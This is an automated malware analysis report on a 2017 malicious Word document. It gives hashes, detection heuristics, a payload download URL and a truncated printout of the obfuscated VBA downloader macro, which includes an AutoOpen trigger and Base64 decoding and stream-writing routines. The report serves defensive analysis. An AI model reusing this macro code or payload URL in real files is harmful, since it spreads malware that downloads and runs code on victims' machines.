Office (OLE) malware analysis — malicious · 471deece8db1af70

MALICIOUS

Office (OLE)

163.5 KB Created: 2017-05-03 10:18:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 6f3d7488db57d2919fd1d482c461b60b SHA-1: d30136774c5c9e7327e8a03ecd6e165988c31c33 SHA-256: 471deece8db1af70fb3efff350f2b423f876775d3a93a681dcd8d182846da0ca

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen function that is triggered upon opening the document. This macro utilizes a Base64-decoded Shell command stager to download and execute a payload from the URL http://cfarchitecture.be/zse7b-g437-hbn. The CreateObject and Shell() calls within the VBA code are indicative of malicious downloader behavior.

Heuristics 9

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://cfarchitecture.be/zse7b-g437-hbn Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17119 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17119 bytes
SHA-256: `6b5182bc7ad5763eaf9f302c11c1ce2ffb2867f074ab4b78e29ee3e569c3d62b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim cg4Oh cg4Oh = Val(bQIc8lOXr) Dim V6uClqcZ As Byte V6uClqcZ = 144 Dim GREpclBg As Integer GREpclBg = 15554 yyNL1RFq End Sub Attribute VB_Name = "Module2" Public Function VEQIr(ByVal GG1XPy) Dim rUEu5N As Byte rUEu5N = 8 Dim hXKFUTR0H As String hXKFUTR0H = Val("U") Dim YcgZu6 As Byte YcgZu6 = 236 Dim kblsyI7Z As Double kblsyI7Z = Sgn(13085.435893818) Dim yVQaRok8 As Boolean yVQaRok8 = False Dim XvnDbRSo Dim sNrwXdHTA Dim qiuEZ As Integer qiuEZ = 6364 Dim iXE68 As String iXE68 = "" Dim yDw0eS As Double yDw0eS = 46955.458537291 Dim cADcSp As Byte cADcSp = 89 Dim irzFC4tg As Long irzFC4tg = 0 Dim izaf3 As Byte izaf3 = 253 Dim bjEG79g As Long bjEG79g = -1921307176 Dim etTbGmq As Long etTbGmq = 0 Dim fXWdwa As Boolean fXWdwa = False Dim f21K8J As Boolean f21K8J = False Set XvnDbRSo = CreateObject("msxml2.domdocument") Dim YXvtDkfrl As Single YXvtDkfrl = Val(16874.922942528) Dim SbcOKN As Integer SbcOKN = Sgn(-19545) Dim taF1OTi As Integer taF1OTi = -4783 Dim TBEHUpY As Double TBEHUpY = Sgn(43532.123687315) Dim HKwhmu9 As Integer HKwhmu9 = Sgn(25546) Dim UNihLHe As Boolean UNihLHe = False Set sNrwXdHTA = XvnDbRSo.CreateElement(xMOA4) Dim Sw29C As Single Sw29C = Fix(59798.663272722) Dim EmRrT94 As Integer EmRrT94 = -24424 With sNrwXdHTA Dim sIBqs sIBqs = StrConv(QMyRn8N, vbProperCase) Dim tcOk7 tcOk7 = AscW("w") sNrwXdHTA.DataType = "bin." & xMOA4 Dim ZxLvjBlX As Byte ZxLvjBlX = 94 Dim w6prJMHl As Byte w6prJMHl = 156 Dim JzSsq As Byte JzSsq = 184 sNrwXdHTA.Text = GG1XPy End With Dim j6gMGb5A As Integer j6gMGb5A = -22473 Dim hcTgi2Aj7 As Integer hcTgi2Aj7 = Sgn(15849) Dim f6Zq42O0 As Single f6Zq42O0 = Int(30448.500983016) VEQIr = eweJpQM(sNrwXdHTA.nodeTypedValue) Dim vq98byEKZ As Byte vq98byEKZ = 9 Dim CJehs5 As Single CJehs5 = Round(26221.041052182) Set sNrwXdHTA = Nothing Set XvnDbRSo = Nothing End Function Function eweJpQM(Binary) Dim U5xYSKP U5xYSKP = LCase(AYsjH) Dim GmW75bUl As Single GmW75bUl = Int(45841.938907585) Dim aBtN0gwHY As Boolean aBtN0gwHY = False Dim Q7iy6 As Long Q7iy6 = -208005992 Dim ONoxtjK As Boolean ONoxtjK = False Const YlSZD = 2 Const LCaXm = 1 Dim Boc2OSJv As Long Boc2OSJv = -1214713290 Dim HxQ7Hph As Integer HxQ7Hph = 26376 Dim cqKjgQzU3 Dim KayKtfFG As Byte KayKtfFG = 134 Dim IjG4dJ As Integer IjG4dJ = -31407 Dim B9pzaglV8 B9pzaglV8 = UCase(kLQdpD) Dim UeUk1B4A9 As Long UeUk1B4A9 = -829695066 Dim exRmVfM1 As Byte exRmVfM1 = 6 Dim UJLg3H As Single UJLg3H = Sgn(31514.649324993) Dim KYis6Szj As Double KYis6Szj = Sgn(30599.396877964) Dim cbmlr As String cbmlr = Val(sXmelRwE) Dim XhzQmSG As Boolean XhzQmSG = False Dim ujogvz7 As Byte ujogvz7 = 47 Set cqKjgQzU3 = CreateObject("adodb.stream") Dim nn5Cz As Byte nn5Cz = 71 Dim vC2Oc As Single vC2Oc = 24887.595359496 Dim WwAWKVR As Boolean WwAWKVR = True Dim R5Z20GL1 As Boolean R5Z20GL1 = True Dim pV05v As String pV05v = AscB("Y") With cqKjgQzU3 Dim qSLpJP As Double qSLpJP = 10799.038407675 Dim c38Majl As Long c38Majl = Sgn(0) .Type = LCaXm Dim iCHtDB2 As Long iCHtDB2 = 0 Dim NrCO4s As Byte NrCO4s = 245 Dim JUMdJKE As Double JUMdJKE = Sgn(54516.763744906) Dim uUCt3 As Integer uUCt3 = -13213 Dim dvtT9 As Integer dvtT9 = Sgn(-19437) .Open Dim kRpJy As Integer kRpJy = Sgn(775) Dim yghIKiSRd yghIKiSRd = Asc("8") Dim yQ2pKMxq1 As Byte yQ2pKMxq1 = 252 Dim rK9HxX87a As Boolean rK9HxX87a = False Dim oQwMNF As Single oQwMNF = Sgn(18234.34037707) .Write Binary Dim mj0dD3tqG As Long mj0dD3tqG = 0 Dim uFUmsO4z As Long uFUmsO4z = -894386862 Dim xQqB805 xQqB805 = LTrim(HJ8Ka1A) Dim dasASGUfP As Single dasASGUfP = Sgn(47812.13930567) .Position = 0 D ... (truncated)

SHA-256: 6b5182bc7ad5763eaf9f302c11c1ce2ffb2867f074ab4b78e29ee3e569c3d62b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim cg4Oh
cg4Oh = Val(bQIc8lOXr)
Dim V6uClqcZ As Byte
V6uClqcZ = 144
Dim GREpclBg As Integer
GREpclBg = 15554
yyNL1RFq
End Sub

Attribute VB_Name = "Module2"
Public Function VEQIr(ByVal GG1XPy)

Dim rUEu5N As Byte
rUEu5N = 8
Dim hXKFUTR0H As String
hXKFUTR0H = Val("U")
Dim YcgZu6 As Byte
YcgZu6 = 236
Dim kblsyI7Z As Double
kblsyI7Z = Sgn(13085.435893818)
Dim yVQaRok8 As Boolean
yVQaRok8 = False
Dim XvnDbRSo
Dim sNrwXdHTA

Dim qiuEZ As Integer
qiuEZ = 6364
Dim iXE68 As String
iXE68 = ""
Dim yDw0eS As Double
yDw0eS = 46955.458537291
Dim cADcSp As Byte
cADcSp = 89

Dim irzFC4tg As Long
irzFC4tg = 0
Dim izaf3 As Byte
izaf3 = 253
Dim bjEG79g As Long
bjEG79g = -1921307176
Dim etTbGmq As Long
etTbGmq = 0
Dim fXWdwa As Boolean
fXWdwa = False
Dim f21K8J As Boolean
f21K8J = False
Set XvnDbRSo = CreateObject("msxml2.domdocument")
Dim YXvtDkfrl As Single
YXvtDkfrl = Val(16874.922942528)
Dim SbcOKN As Integer
SbcOKN = Sgn(-19545)
Dim taF1OTi As Integer
taF1OTi = -4783
Dim TBEHUpY As Double
TBEHUpY = Sgn(43532.123687315)
Dim HKwhmu9 As Integer
HKwhmu9 = Sgn(25546)
Dim UNihLHe As Boolean
UNihLHe = False
Set sNrwXdHTA = XvnDbRSo.CreateElement(xMOA4)
Dim Sw29C As Single
Sw29C = Fix(59798.663272722)
Dim EmRrT94 As Integer
EmRrT94 = -24424
With sNrwXdHTA
Dim sIBqs
sIBqs = StrConv(QMyRn8N, vbProperCase)
Dim tcOk7
tcOk7 = AscW("w")
sNrwXdHTA.DataType = "bin." & xMOA4

Dim ZxLvjBlX As Byte
ZxLvjBlX = 94
Dim w6prJMHl As Byte
w6prJMHl = 156
Dim JzSsq As Byte
JzSsq = 184
sNrwXdHTA.Text = GG1XPy
End With

Dim j6gMGb5A As Integer
j6gMGb5A = -22473
Dim hcTgi2Aj7 As Integer
hcTgi2Aj7 = Sgn(15849)
Dim f6Zq42O0 As Single
f6Zq42O0 = Int(30448.500983016)
VEQIr = eweJpQM(sNrwXdHTA.nodeTypedValue)

Dim vq98byEKZ As Byte
vq98byEKZ = 9
Dim CJehs5 As Single
CJehs5 = Round(26221.041052182)
Set sNrwXdHTA = Nothing
Set XvnDbRSo = Nothing
End Function
Function eweJpQM(Binary)
Dim U5xYSKP
U5xYSKP = LCase(AYsjH)
Dim GmW75bUl As Single
GmW75bUl = Int(45841.938907585)
Dim aBtN0gwHY As Boolean
aBtN0gwHY = False
Dim Q7iy6 As Long
Q7iy6 = -208005992
Dim ONoxtjK As Boolean
ONoxtjK = False
Const YlSZD = 2
Const LCaXm = 1

Dim Boc2OSJv As Long
Boc2OSJv = -1214713290
Dim HxQ7Hph As Integer
HxQ7Hph = 26376
Dim cqKjgQzU3

Dim KayKtfFG As Byte
KayKtfFG = 134
Dim IjG4dJ As Integer
IjG4dJ = -31407
Dim B9pzaglV8
B9pzaglV8 = UCase(kLQdpD)
Dim UeUk1B4A9 As Long
UeUk1B4A9 = -829695066
Dim exRmVfM1 As Byte
exRmVfM1 = 6
Dim UJLg3H As Single
UJLg3H = Sgn(31514.649324993)
Dim KYis6Szj As Double
KYis6Szj = Sgn(30599.396877964)
Dim cbmlr As String
cbmlr = Val(sXmelRwE)
Dim XhzQmSG As Boolean
XhzQmSG = False
Dim ujogvz7 As Byte
ujogvz7 = 47
Set cqKjgQzU3 = CreateObject("adodb.stream")

Dim nn5Cz As Byte
nn5Cz = 71
Dim vC2Oc As Single
vC2Oc = 24887.595359496
Dim WwAWKVR As Boolean
WwAWKVR = True
Dim R5Z20GL1 As Boolean
R5Z20GL1 = True
Dim pV05v As String
pV05v = AscB("Y")
With cqKjgQzU3

Dim qSLpJP As Double
qSLpJP = 10799.038407675
Dim c38Majl As Long
c38Majl = Sgn(0)
.Type = LCaXm

Dim iCHtDB2 As Long
iCHtDB2 = 0
Dim NrCO4s As Byte
NrCO4s = 245
Dim JUMdJKE As Double
JUMdJKE = Sgn(54516.763744906)
Dim uUCt3 As Integer
uUCt3 = -13213
Dim dvtT9 As Integer
dvtT9 = Sgn(-19437)
.Open
Dim kRpJy As Integer
kRpJy = Sgn(775)
Dim yghIKiSRd
yghIKiSRd = Asc("8")
Dim yQ2pKMxq1 As Byte
yQ2pKMxq1 = 252
Dim rK9HxX87a As Boolean
rK9HxX87a = False
Dim oQwMNF As Single
oQwMNF = Sgn(18234.34037707)
.Write Binary

Dim mj0dD3tqG As Long
mj0dD3tqG = 0
Dim uFUmsO4z As Long
uFUmsO4z = -894386862
Dim xQqB805
xQqB805 = LTrim(HJ8Ka1A)
Dim dasASGUfP As Single
dasASGUfP = Sgn(47812.13930567)
.Position = 0

D
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.